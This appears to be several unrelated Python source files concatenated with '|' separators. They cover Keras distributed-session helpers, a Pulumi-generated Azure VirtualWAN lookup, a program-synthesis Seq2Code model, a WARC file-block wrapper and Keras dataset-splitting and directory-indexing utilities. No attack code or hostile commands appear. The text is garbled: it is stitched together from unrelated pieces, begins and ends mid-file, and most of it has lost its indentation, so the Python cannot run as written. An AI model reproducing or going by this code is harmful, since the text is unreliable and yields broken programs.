    # Ignore permission-denied errors.
pass
def in_multi_worker_mode():
"""Whether we are operating in a Multi-Worker setting."""
tf_config = json.loads(os.environ.get('TF_CONFIG', '{}'))
cluster_spec = server_lib.ClusterSpec(tf_config.get('cluster', {}))
return tf_config and 'master' not in cluster_spec.jobs
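# Worked example (hypothetical cluster spec, not part of the original module):
# `in_multi_worker_mode()` returns True for a TF_CONFIG that defines worker jobs
# but no 'master' job. Relies on the `os` and `json` imports used above.
def _example_multi_worker_config():
  os.environ['TF_CONFIG'] = json.dumps({
      'cluster': {'worker': ['host1:2222', 'host2:2222']},
      'task': {'type': 'worker', 'index': 0},
  })
  return in_multi_worker_mode()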
def configure_and_create_distributed_session(distribution_strategy):
"""Configure session config and create a session with it."""
def _create_session(distribution_strategy):
"""Create the Distributed Strategy session."""
session_config = get_default_session_config()
# If a session already exists, merge in its config; in the case there is a
# conflict, take values of the existing config.
global _SESSION
if getattr(_SESSION, 'session', None) and _SESSION.session._config:
session_config.MergeFrom(_SESSION.session._config)
if is_tpu_strategy(distribution_strategy):
# TODO(priyag, yuefengz): Remove this workaround when Distribute
# Coordinator is integrated with keras and we can create a session from
# there.
distribution_strategy.configure(session_config)
master = distribution_strategy.extended._tpu_cluster_resolver.master() # pylint: disable=protected-access
session = session_module.Session(config=session_config, target=master)
else:
worker_context = dc_context.get_current_worker_context()
if worker_context:
dc_session_config = worker_context.session_config
# Merge the default session config to the one from distribute
# coordinator, which is fine for now since they don't have
# conflicting configurations.
dc_session_config.MergeFrom(session_config)
session = session_module.Session(
config=dc_session_config, target=worker_context.master_target)
else:
distribution_strategy.configure(session_config)
session = session_module.Session(config=session_config)
set_session(session)
if in_multi_worker_mode():
dc.run_distribute_coordinator(
_create_session,
distribution_strategy,
mode=dc.CoordinatorMode.INDEPENDENT_WORKER)
else:
_create_session(distribution_strategy)
def is_tpu_strategy(strategy):
"""We're executing TPU Strategy."""
return strategy is not None and strategy.__class__.__name__ == 'TPUStrategy'
def cast_variables_to_tensor(tensors):
def _cast_variables_to_tensor(tensor):
if isinstance(tensor, variables_module.Variable):
return array_ops.identity(tensor)
return tensor
return nest.map_structure(_cast_variables_to_tensor, tensors)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetVirtualWanResult',
'AwaitableGetVirtualWanResult',
'get_virtual_wan',
]
@pulumi.output_type
class GetVirtualWanResult:
"""
VirtualWAN Resource.
"""
def __init__(__self__, allow_branch_to_branch_traffic=None, allow_vnet_to_vnet_traffic=None, disable_vpn_encryption=None, etag=None, location=None, name=None, office365_local_breakout_category=None, p2_s_vpn_server_configurations=None, provisioning_state=None, security_provider_name=None, tags=None, type=None, virtual_hubs=None, vpn_sites=None):
if allow_branch_to_branch_traffic and not isinstance(allow_branch_to_branch_traffic, bool):
raise TypeError("Expected argument 'allow_branch_to_branch_traffic' to be a bool")
pulumi.set(__self__, "allow_branch_to_branch_traffic", allow_branch_to_branch_traffic)
if allow_vnet_to_vnet_traffic and not isinstance(allow_vnet_to_vnet_traffic, bool):
raise TypeError("Expected argument 'allow_vnet_to_vnet_traffic' to be a bool")
pulumi.set(__self__, "allow_vnet_to_vnet_traffic", allow_vnet_to_vnet_traffic)
if disable_vpn_encryption and not isinstance(disable_vpn_encryption, bool):
raise TypeError("Expected argument 'disable_vpn_encryption' to be a bool")
pulumi.set(__self__, "disable_vpn_encryption", disable_vpn_encryption)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if office365_local_breakout_category and not isinstance(office365_local_breakout_category, str):
raise TypeError("Expected argument 'office365_local_breakout_category' to be a str")
pulumi.set(__self__, "office365_local_breakout_category", office365_local_breakout_category)
if p2_s_vpn_server_configurations and not isinstance(p2_s_vpn_server_configurations, list):
raise TypeError("Expected argument 'p2_s_vpn_server_configurations' to be a list")
pulumi.set(__self__, "p2_s_vpn_server_configurations", p2_s_vpn_server_configurations)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if security_provider_name and not isinstance(security_provider_name, str):
raise TypeError("Expected argument 'security_provider_name' to be a str")
pulumi.set(__self__, "security_provider_name", security_provider_name)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_hubs and not isinstance(virtual_hubs, list):
raise TypeError("Expected argument 'virtual_hubs' to be a list")
pulumi.set(__self__, "virtual_hubs", virtual_hubs)
if vpn_sites and not isinstance(vpn_sites, list):
raise TypeError("Expected argument 'vpn_sites' to be a list")
pulumi.set(__self__, "vpn_sites", vpn_sites)
@property
@pulumi.getter(name="allowBranchToBranchTraffic")
def allow_branch_to_branch_traffic(self) -> Optional[bool]:
"""
True if branch to branch traffic is allowed.
"""
return pulumi.get(self, "allow_branch_to_branch_traffic")
@property
@pulumi.getter(name="allowVnetToVnetTraffic")
def allow_vnet_to_vnet_traffic(self) -> Optional[bool]:
"""
True if Vnet to Vnet traffic is allowed.
"""
return pulumi.get(self, "allow_vnet_to_vnet_traffic")
@property
@pulumi.getter(name="disableVpnEncryption")
def disable_vpn_encryption(self) -> Optional[bool]:
"""
Vpn encryption to be disabled or not.
"""
return pulumi.get(self, "disable_vpn_encryption")
@property
@pulumi.getter
def etag(self) -> str:
"""
Gets a unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="office365LocalBreakoutCategory")
def office365_local_breakout_category(self) -> str:
"""
The office local breakout category.
"""
return pulumi.get(self, "office365_local_breakout_category")
@property
@pulumi.getter(name="p2SVpnServerConfigurations")
def p2_s_vpn_server_configurations(self) -> Optional[Sequence['outputs.P2SVpnServerConfigurationResponse']]:
"""
        List of all P2SVpnServerConfigurations associated with the VirtualWAN.
"""
return pulumi.get(self, "p2_s_vpn_server_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="securityProviderName")
def security_provider_name(self) -> Optional[str]:
"""
The Security Provider name.
"""
return pulumi.get(self, "security_provider_name")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualHubs")
def virtual_hubs(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of VirtualHubs in the VirtualWAN.
"""
return pulumi.get(self, "virtual_hubs")
@property
@pulumi.getter(name="vpnSites")
def vpn_sites(self) -> Sequence['outputs.SubResourceResponse']:
return pulumi.get(self, "vpn_sites")
class AwaitableGetVirtualWanResult(GetVirtualWanResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualWanResult(
allow_branch_to_branch_traffic=self.allow_branch_to_branch_traffic,
allow_vnet_to_vnet_traffic=self.allow_vnet_to_vnet_traffic,
disable_vpn_encryption=self.disable_vpn_encryption,
etag=self.etag,
location=self.location,
name=self.name,
office365_local_breakout_category=self.office365_local_breakout_category,
p2_s_vpn_server_configurations=self.p2_s_vpn_server_configurations,
provisioning_state=self.provisioning_state,
security_provider_name=self.security_provider_name,
tags=self.tags,
type=self.type,
virtual_hubs=self.virtual_hubs,
vpn_sites=self.vpn_sites)
def get_virtual_wan(resource_group_name: Optional[str] = None,
virtual_wan_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualWanResult:
"""
Use this data source to access information about an existing resource.
:param str resource_group_name: The resource group name of the VirtualWan.
:param str virtual_wan_name: The name of the VirtualWAN being retrieved.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['virtualWANName'] = virtual_wan_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20181101:getVirtualWan', __args__, opts=opts, typ=GetVirtualWanResult).value
return AwaitableGetVirtualWanResult(
allow_branch_to_branch_traffic=__ret__.allow_branch_to_branch_traffic,
allow_vnet_to_vnet_traffic=__ret__.allow_vnet_to_vnet_traffic,
disable_vpn_encryption=__ret__.disable_vpn_encryption,
etag=__ret__.etag,
location=__ret__.location,
name=__ret__.name,
office365_local_breakout_category=__ret__.office365_local_breakout_category,
p2_s_vpn_server_configurations=__ret__.p2_s_vpn_server_configurations,
provisioning_state=__ret__.provisioning_state,
security_provider_name=__ret__.security_provider_name,
tags=__ret__.tags,
type=__ret__.type,
virtual_hubs=__ret__.virtual_hubs,
vpn_sites=__ret__.vpn_sites)
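# Usage sketch (hypothetical resource names, not part of the generated module):
# inside a Pulumi program, look up an existing VirtualWAN and export a couple of
# its resolved outputs.
def _example_get_virtual_wan():
    result = get_virtual_wan(resource_group_name="example-rg",
                             virtual_wan_name="example-wan")
    pulumi.export("virtualWanLocation", result.location)
    pulumi.export("virtualWanProvisioningState", result.provisioning_state)
    return result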
|
from __future__ import absolute_import
import os
import sys
import collections
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from program_synthesis.algolisp.dataset import data
from program_synthesis.algolisp.models import prepare_spec
from program_synthesis.algolisp.models.base import BaseCodeModel, InferenceResult, MaskedMemory, get_attn_mask
class Seq2CodeModel(BaseCodeModel):
def encode_text(self, stoi, batch):
inputs = prepare_spec.encode_schema_text(
stoi, batch, self.args.cuda)
hidden, memory = self.model.encode_text(inputs)
memory, seq_lengths, hidden = memory.pad(batch_first=True,
others_to_unsort=[hidden])
return hidden, memory, seq_lengths
def encode_io(self, stoi, batch):
input_keys, inputs, arg_nums, outputs = prepare_spec.encode_io(
stoi, batch, self.args.cuda)
task_enc = self.model.encode_io(input_keys, inputs, arg_nums, outputs)
return task_enc, task_enc.unsqueeze(1)
def encode_code(self, stoi, batch):
batch_ids, (code_seqs, unsort_idx) = prepare_spec.encode_candidate_code_seq(
stoi, batch, self.args.cuda)
code_info = None
if code_seqs:
hidden, memory = self.model.encode_code(code_seqs)
memory, seq_lengths, hidden = memory.pad(batch_first=True,
others_to_unsort=[hidden])
code_info = (hidden, memory, seq_lengths)
return self.model.extend_tensors(code_info, len(batch), batch_ids)
def encode(self, vocab, batch):
text_task_enc, text_memory, text_lengths = None, None, None
io_task_enc = None
code_enc, code_memory, code_lengths = None, None, None
if self.args.read_text:
text_task_enc, text_memory, text_lengths = self.encode_text(
vocab.wordtoi, batch)
if self.args.read_io:
io_task_enc, _ = self.encode_io(vocab.codetoi, batch)
hidden, memory, seq_lengths = self.model.encoder(
text_task_enc, text_memory, text_lengths, io_task_enc, code_enc,
code_memory, code_lengths)
attn_mask = get_attn_mask(seq_lengths, self.args.cuda) if seq_lengths else None
return hidden, MaskedMemory(memory, attn_mask)
|
# ------------------------------------------------------------------- #
# Copyright (c) 2007-2008 Hanzo Archives Limited. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# You may find more information about Hanzo Archives at #
# #
# http://www.hanzoarchives.com/ #
# #
# You may find more information about the WARC Tools project at #
# #
# http://code.google.com/p/warc-tools/ #
# ------------------------------------------------------------------- #
import warc
from wfile import WFile
from wrecord import WRecord
import sys
sys.path.insert (0, ".")
from wtypes import WTypes
#class WTypes:
#"A class to define Python WARC classes types"
#def __init__(self):
#self.WNone = 0
#self.WFile = 1
#self.WRecord = 2
#self.WBloc = 3
#self.AFile = 4
#self.ARecord = 5
class WBloc:
##Constructor ##
def __init__(self, wfile, wrec, httpheaders, alloc):
self.classtype = WTypes()
self.httpheaders = httpheaders
        if (wfile.type != self.classtype.WFile or wrec.type != self.classtype.WRecord):
            # Returning a value from __init__ raises a TypeError at runtime,
            # so reject the wrong argument types explicitly instead.
            raise TypeError("WBloc expects a WFile and a WRecord instance")
self.type = self.classtype.WBloc
self.me = warc.bless_WBloc(wfile.getInternal(self), wrec.getInternal(self), self.httpheaders, alloc)
## Bloc chunks recovering ##
def getNext0(self):
return warc.WBloc_next(self.me)
def getNext(self):
return warc.WRAPPER_WBloc_next(self.me)
def getHttpCode(self):
return warc.WBloc_getHttpCode(self.me)
def getLastChunkSize (self):
return warc.WBloc_getLastChunkSize(self.me)
## Python WBloc class particular methods
def type(self):
return self.type
## Destructor ##
def destroy(self):
warc.destroy(self.me)
## end ##
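## Usage sketch (hypothetical; how the WFile/WRecord objects and the ##
## httpheaders/alloc flags are built depends on the surrounding      ##
## warc-tools wrapper code): stream one record payload chunk by chunk. ##
def example_read_bloc(wfile, wrecord, httpheaders, alloc):
    bloc = WBloc(wfile, wrecord, httpheaders, alloc)
    chunk = bloc.getNext()
    while chunk:
        sys.stdout.write(chunk)
        chunk = bloc.getNext()
    bloc.destroy()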
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras image dataset loading utilities."""
import multiprocessing
import os
import random
import time
import warnings
import numpy as np
import tensorflow.compat.v2 as tf
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.utils.split_dataset", v1=[])
def split_dataset(
dataset, left_size=None, right_size=None, shuffle=False, seed=None
):
"""Split a dataset into a left half and a right half (e.g. train / test).
Args:
dataset: A `tf.data.Dataset` object or a list/tuple of arrays with the
same length.
        left_size: If float, it should be in the range `[0, 1]` and signifies
the fraction of the data to pack in the left dataset. If integer, it
signifies the number of samples to pack in the left dataset. If
`None`, it defaults to the complement to `right_size`.
        right_size: If float, it should be in the range `[0, 1]` and signifies
the fraction of the data to pack in the right dataset. If integer, it
signifies the number of samples to pack in the right dataset. If
`None`, it defaults to the complement to `left_size`.
shuffle: Boolean, whether to shuffle the data before splitting it.
seed: A random seed for shuffling.
Returns:
A tuple of two `tf.data.Dataset` objects: the left and right splits.
"""
dataset_type_spec = _get_type_spec(dataset)
if dataset_type_spec not in [tf.data.Dataset, list, tuple, np.ndarray]:
raise TypeError(
"The `dataset` argument must be either a `tf.data.Dataset` "
"object or a list/tuple of arrays. "
f"Received: dataset={dataset} of type {type(dataset)}"
)
if right_size is None and left_size is None:
raise ValueError(
"At least one of the `left_size` or `right_size` "
"must be specified. Received: left_size=None and "
"right_size=None"
)
dataset_as_list = _convert_dataset_to_list(dataset, dataset_type_spec)
if shuffle:
if seed is None:
seed = random.randint(0, int(1e6))
random.seed(seed)
random.shuffle(dataset_as_list)
total_length = len(dataset_as_list)
left_size, right_size = _rescale_dataset_split_sizes(
left_size, right_size, total_length
)
left_split = list(dataset_as_list[:left_size])
right_split = list(dataset_as_list[-right_size:])
left_split = _restore_dataset_from_list(
left_split, dataset_type_spec, dataset
)
right_split = _restore_dataset_from_list(
right_split, dataset_type_spec, dataset
)
left_split = tf.data.Dataset.from_tensor_slices(left_split)
right_split = tf.data.Dataset.from_tensor_slices(right_split)
# apply batching to the splits if the dataset is batched
if dataset_type_spec is tf.data.Dataset and is_batched(dataset):
batch_size = get_batch_size(dataset)
if batch_size is not None:
left_split = left_split.batch(batch_size)
right_split = right_split.batch(batch_size)
left_split = left_split.prefetch(tf.data.AUTOTUNE)
right_split = right_split.prefetch(tf.data.AUTOTUNE)
return left_split, right_split
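# Usage sketch (synthetic data, not part of the original module): split an array
# of 100 samples 80/20 into training and test `tf.data.Dataset` objects.
def _example_split_dataset():
    samples = np.random.rand(100, 8)
    train_ds, test_ds = split_dataset(samples, left_size=0.8, shuffle=True, seed=42)
    # train_ds and test_ds yield 80 and 20 row vectors of shape (8,) respectively.
    return train_ds, test_ds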
def _convert_dataset_to_list(
dataset,
dataset_type_spec,
data_size_warning_flag=True,
ensure_shape_similarity=True,
):
"""Convert `tf.data.Dataset` object or list/tuple of NumPy arrays to a list.
Args:
dataset : A `tf.data.Dataset` object or a list/tuple of arrays.
dataset_type_spec : the type of the dataset
data_size_warning_flag (bool, optional): If set to True, a warning will
be issued if the dataset takes longer than 10 seconds to iterate.
Defaults to True.
ensure_shape_similarity (bool, optional): If set to True, the shape of
the first sample will be used to validate the shape of rest of the
samples. Defaults to True.
Returns:
List: A list of tuples/NumPy arrays.
"""
dataset_iterator = _get_data_iterator_from_dataset(
dataset, dataset_type_spec
)
dataset_as_list = []
start_time = time.time()
for sample in _get_next_sample(
dataset_iterator,
ensure_shape_similarity,
data_size_warning_flag,
start_time,
):
if dataset_type_spec in [tuple, list]:
dataset_as_list.append(np.array(sample))
else:
dataset_as_list.append(sample)
return dataset_as_list
def _get_data_iterator_from_dataset(dataset, dataset_type_spec):
"""Get the iterator from a dataset.
Args:
dataset : A `tf.data.Dataset` object or a list/tuple of arrays.
dataset_type_spec : the type of the dataset
Raises:
ValueError:
- If the dataset is empty.
- If the dataset is not a `tf.data.Dataset` object
or a list/tuple of arrays.
            - If the dataset is a list/tuple of arrays and the
              arrays do not all have the same length.
Returns:
iterator: An `iterator` object.
"""
if dataset_type_spec == list:
if len(dataset) == 0:
raise ValueError(
"Received an empty list dataset. "
"Please provide a non-empty list of arrays."
)
if _get_type_spec(dataset[0]) is np.ndarray:
expected_shape = dataset[0].shape
for i, element in enumerate(dataset):
if np.array(element).shape[0] != expected_shape[0]:
raise ValueError(
"Received a list of NumPy arrays with different "
f"lengths. Mismatch found at index {i}, "
f"Expected shape={expected_shape} "
f"Received shape={np.array(element).shape}."
f"Please provide a list of NumPy arrays with "
f"the same length."
)
else:
raise ValueError(
"Expected a list of `numpy.ndarray` objects,"
f"Received: {type(dataset[0])}"
)
return iter(zip(*dataset))
elif dataset_type_spec == tuple:
if len(dataset) == 0:
raise ValueError(
"Received an empty list dataset."
"Please provide a non-empty tuple of arrays."
)
if _get_type_spec(dataset[0]) is np.ndarray:
expected_shape = dataset[0].shape
for i, element in enumerate(dataset):
if np.array(element).shape[0] != expected_shape[0]:
raise ValueError(
"Received a tuple of NumPy arrays with different "
f"lengths. Mismatch found at index {i}, "
f"Expected shape={expected_shape} "
f"Received shape={np.array(element).shape}."
f"Please provide a tuple of NumPy arrays with "
"the same length."
)
else:
raise ValueError(
"Expected a tuple of `numpy.ndarray` objects, "
f"Received: {type(dataset[0])}"
)
return iter(zip(*dataset))
elif dataset_type_spec == tf.data.Dataset:
if is_batched(dataset):
dataset = dataset.unbatch()
return iter(dataset)
elif dataset_type_spec == np.ndarray:
return iter(dataset)
def _get_next_sample(
dataset_iterator,
ensure_shape_similarity,
data_size_warning_flag,
start_time,
):
""" "Yield data samples from the `dataset_iterator`.
Args:
dataset_iterator : An `iterator` object.
ensure_shape_similarity (bool, optional): If set to True, the shape of
the first sample will be used to validate the shape of rest of the
samples. Defaults to True.
data_size_warning_flag (bool, optional): If set to True, a warning will
be issued if the dataset takes longer than 10 seconds to iterate.
Defaults to True.
start_time (float): the start time of the dataset iteration. this is
used only if `data_size_warning_flag` is set to true.
Raises:
ValueError: - If the dataset is empty.
- If `ensure_shape_similarity` is set to True and the
shape of the first sample is not equal to the shape of
              at least one of the rest of the samples.
Yields:
data_sample: A tuple/list of numpy arrays.
"""
try:
dataset_iterator = iter(dataset_iterator)
first_sample = next(dataset_iterator)
if isinstance(first_sample, (tf.Tensor, np.ndarray)):
first_sample_shape = np.array(first_sample).shape
else:
first_sample_shape = None
ensure_shape_similarity = False
yield first_sample
except StopIteration:
raise ValueError(
"Received an empty Dataset. `dataset` must "
"be a non-empty list/tuple of `numpy.ndarray` objects "
"or `tf.data.Dataset` objects."
)
for i, sample in enumerate(dataset_iterator):
if ensure_shape_similarity:
if first_sample_shape != np.array(sample).shape:
raise ValueError(
"All `dataset` samples must have same shape, "
f"Expected shape: {np.array(first_sample).shape} "
f"Received shape: {np.array(sample).shape} at index "
f"{i}."
)
if data_size_warning_flag:
if i % 10 == 0:
cur_time = time.time()
# warns user if the dataset is too large to iterate within 10s
if int(cur_time - start_time) > 10 and data_size_warning_flag:
warnings.warn(
"The dataset is taking longer than 10 seconds to "
"iterate over. This may be due to the size of the "
"dataset. Keep in mind that the `split_dataset` "
"utility is only for small in-memory dataset "
"(e.g. < 10,000 samples).",
category=ResourceWarning,
source="split_dataset",
)
data_size_warning_flag = False
yield sample
def _restore_dataset_from_list(
dataset_as_list, dataset_type_spec, original_dataset
):
"""Restore the dataset from the list of arrays."""
if dataset_type_spec in [tuple, list]:
return tuple(np.array(sample) for sample in zip(*dataset_as_list))
elif dataset_type_spec == tf.data.Dataset:
if isinstance(original_dataset.element_spec, dict):
restored_dataset = {}
for d in dataset_as_list:
for k, v in d.items():
if k not in restored_dataset:
restored_dataset[k] = [v]
else:
restored_dataset[k].append(v)
return restored_dataset
else:
return tuple(np.array(sample) for sample in zip(*dataset_as_list))
return dataset_as_list
def _rescale_dataset_split_sizes(left_size, right_size, total_length):
"""Rescale the dataset split sizes.
We want to ensure that the sum of
the split sizes is equal to the total length of the dataset.
Args:
left_size : The size of the left dataset split.
right_size : The size of the right dataset split.
total_length : The total length of the dataset.
Raises:
TypeError: - If `left_size` or `right_size` is not an integer or float.
ValueError: - If `left_size` or `right_size` is negative or greater
than 1 or greater than `total_length`.
Returns:
tuple: A tuple of rescaled left_size and right_size
"""
left_size_type = type(left_size)
right_size_type = type(right_size)
# check both left_size and right_size are integers or floats
if (left_size is not None and left_size_type not in [int, float]) and (
right_size is not None and right_size_type not in [int, float]
):
raise TypeError(
"Invalid `left_size` and `right_size` Types. Expected: "
"integer or float or None, Received: type(left_size)="
f"{left_size_type} and type(right_size)={right_size_type}"
)
    # check left_size is an integer or float
if left_size is not None and left_size_type not in [int, float]:
raise TypeError(
"Invalid `left_size` Type. Expected: int or float or None, "
f"Received: type(left_size)={left_size_type}. "
)
    # check right_size is an integer or float
if right_size is not None and right_size_type not in [int, float]:
raise TypeError(
f"Invalid `right_size` Type. "
"Expected: int or float or None,"
f"Received: type(right_size)={right_size_type}."
)
# check left_size and right_size are non-zero
if left_size == 0 and right_size == 0:
raise ValueError(
"Both `left_size` and `right_size` are zero. "
"At least one of the split sizes must be non-zero."
)
# check left_size is non-negative and less than 1 and less than total_length
if (
left_size_type == int
and (left_size <= 0 or left_size >= total_length)
or left_size_type == float
and (left_size <= 0 or left_size >= 1)
):
raise ValueError(
"`left_size` should be either a positive integer "
f"smaller than {total_length}, or a float "
"within the range `[0, 1]`. Received: left_size="
f"{left_size}"
)
# check right_size is non-negative and less than 1 and less than
# total_length
if (
right_size_type == int
and (right_size <= 0 or right_size >= total_length)
or right_size_type == float
and (right_size <= 0 or right_size >= 1)
):
raise ValueError(
"`right_size` should be either a positive integer "
f"and smaller than {total_length} or a float "
"within the range `[0, 1]`. Received: right_size="
f"{right_size}"
)
# check sum of left_size and right_size is less than or equal to
# total_length
if (
right_size_type == left_size_type == float
and right_size + left_size > 1
):
raise ValueError(
"The sum of `left_size` and `right_size` is greater "
"than 1. It must be less than or equal to 1."
)
if left_size_type == float:
left_size = round(left_size * total_length)
elif left_size_type == int:
left_size = float(left_size)
if right_size_type == float:
right_size = round(right_size * total_length)
elif right_size_type == int:
right_size = float(right_size)
if left_size is None:
left_size = total_length - right_size
elif right_size is None:
right_size = total_length - left_size
if left_size + right_size > total_length:
raise ValueError(
"The sum of `left_size` and `right_size` should "
"be smaller than the {total_length}. "
f"Received: left_size + right_size = {left_size+right_size}"
f"and total_length = {total_length}"
)
for split, side in [(left_size, "left"), (right_size, "right")]:
if split == 0:
raise ValueError(
f"With `dataset` of length={total_length}, `left_size`="
f"{left_size} and `right_size`={right_size}."
f"Resulting {side} side dataset split will be empty. "
"Adjust any of the aforementioned parameters"
)
left_size, right_size = int(left_size), int(right_size)
return left_size, right_size
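# Worked example (values chosen for illustration, not part of the original
# module): for a dataset of length 100, a fractional `left_size` of 0.8 with
# `right_size=None` rescales to (80, 20); when only one side is given the two
# sizes always sum to `total_length`.
def _example_rescale_split_sizes():
    left, right = _rescale_dataset_split_sizes(
        left_size=0.8, right_size=None, total_length=100
    )
    return left, right  # (80, 20)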
def _get_type_spec(dataset):
"""Get the type spec of the dataset."""
if isinstance(dataset, tuple):
return tuple
elif isinstance(dataset, list):
return list
elif isinstance(dataset, np.ndarray):
return np.ndarray
elif isinstance(dataset, dict):
return dict
elif isinstance(dataset, tf.data.Dataset):
return tf.data.Dataset
else:
return None
def is_batched(tf_dataset):
""" "Check if the `tf.data.Dataset` is batched."""
try:
return tf_dataset.__class__.__name__ == "BatchDataset"
except AttributeError:
return False
def get_batch_size(tf_dataset):
"""Get the batch size of the dataset."""
if is_batched(tf_dataset):
return tf_dataset._batch_size
else:
return None
def index_directory(
directory,
labels,
formats,
class_names=None,
shuffle=True,
seed=None,
follow_links=False,
):
"""Make list of all files in the subdirs of `directory`, with their labels.
Args:
directory: The target directory (string).
labels: Either "inferred"
(labels are generated from the directory structure),
None (no labels),
or a list/tuple of integer labels of the same size as the number of
valid files found in the directory. Labels should be sorted according
to the alphanumeric order of the image file paths
(obtained via `os.walk(directory)` in Python).
formats: Allowlist of file extensions to index (e.g. ".jpg", ".txt").
class_names: Only valid if "labels" is "inferred". This is the explicit
list of class names (must match names of subdirectories). Used
to control the order of the classes
(otherwise alphanumerical order is used).
shuffle: Whether to shuffle the data. Default: True.
If set to False, sorts the data in alphanumeric order.
seed: Optional random seed for shuffling.
        follow_links: Whether to visit subdirectories pointed to by symlinks.
Returns:
tuple (file_paths, labels, class_names).
file_paths: list of file paths (strings).
labels: list of matching integer labels (same length as file_paths)
class_names: names of the classes corresponding to these labels, in
order.
"""
if labels is None:
# in the no-label case, index from the parent directory down.
subdirs = [""]
class_names = subdirs
else:
subdirs = []
for subdir in sorted(tf.io.gfile.listdir(directory)):
if tf.io.gfile.isdir(tf.io.gfile.join(directory, subdir)):
if subdir.endswith("/"):
subdir = subdir[:-1]
subdirs.append(subdir)
if not class_names:
class_names = subdirs
else:
if set(class_names) != set(subdirs):
raise ValueError(
"The `class_names` passed did not match the "
"names of the subdirectories of the target directory. "
f"Expected: {subdirs}, but received: {class_names}"
)
class_indices = dict(zip(class_names, range(len(class_names))))
# Build an index of the files
# in the different class subfolders.
pool = multiprocessing.pool.ThreadPool()
results = []
filenames = []
for dirpath in (tf.io.gfile.join(directory, subdir) for subdir in subdirs):
results.append(
pool.apply_async(
index_subdirectory,
(dirpath, class_indices, follow_links, formats),
)
)
labels_list = []
for res in results:
partial_filenames, partial_labels = res.get()
labels_list.append(partial_labels)
filenames += partial_filenames
if labels not in ("inferred", None):
if len(labels) != len(filenames):
raise ValueError(
"Expected the lengths of `labels` to match the number "
"of files in the target directory. len(labels) is "
f"{len(labels)} while we found {len(filenames)} files "
f"in directory {directory}."
)
else:
i = 0
labels = np.zeros((len(filenames),), dtype="int32")
for partial_labels in labels_list:
labels[i : i + len(partial_labels)] = partial_labels
i += len(partial_labels)
if labels is None:
print(f"Found {len(filenames)} files.")
else:
print(
f"Found {len(filenames)} files belonging "
f"to {len(class_names)} classes."
)
pool.close()
pool.join()
file_paths = [tf.io.gfile.join(directory, fname) for fname in filenames]
if shuffle:
# Shuffle globally to erase macro-structure
if seed is None:
seed = np.random.randint(1e6)
rng = np.random.RandomState(seed)
rng.shuffle(file_paths)
rng = np.random.RandomState(seed)
rng.shuffle(labels)
return file_paths, labels, class_names
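# Usage sketch (hypothetical directory layout, not part of the original module):
# index a folder whose subdirectories name the classes, keeping only PNG and
# JPEG files.
def _example_index_directory():
    file_paths, labels, class_names = index_directory(
        "path/to/images",  # hypothetical root with one subfolder per class
        labels="inferred",
        formats=(".png", ".jpg", ".jpeg"),
        shuffle=True,
        seed=1337,
    )
    return file_paths, labels, class_names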
def iter_valid_files(directory, follow_links, formats):
if not follow_links:
walk = tf.io.gfile.walk(directory)
else:
walk = os.walk(directory, followlinks=follow_links)
for root, _, files in sorted(walk, key=lambda x: x[0]):
for fname in sorted(files):
if fname.lower().endswith(formats):
yield root, fname
def index_subdirectory(directory, class_indices, follow_links, formats):
"""Recursively walks directory and list image paths and their class index.
Args:
directory: string, target directory.
class_indices: dict mapping class names to their index.
follow_links: boolean, whether to recursively follow subdirectories
(if False, we only list top-level images in `directory`).
formats: Allowlist of file extensions to index (e.g. ".jpg", ".txt").
Returns:
tuple `(filenames, labels)`. `filenames` is a list of relative file
paths, and `labels` is a list of integer labels corresponding to these
files.
"""
dirname = os.path.basename(directory)
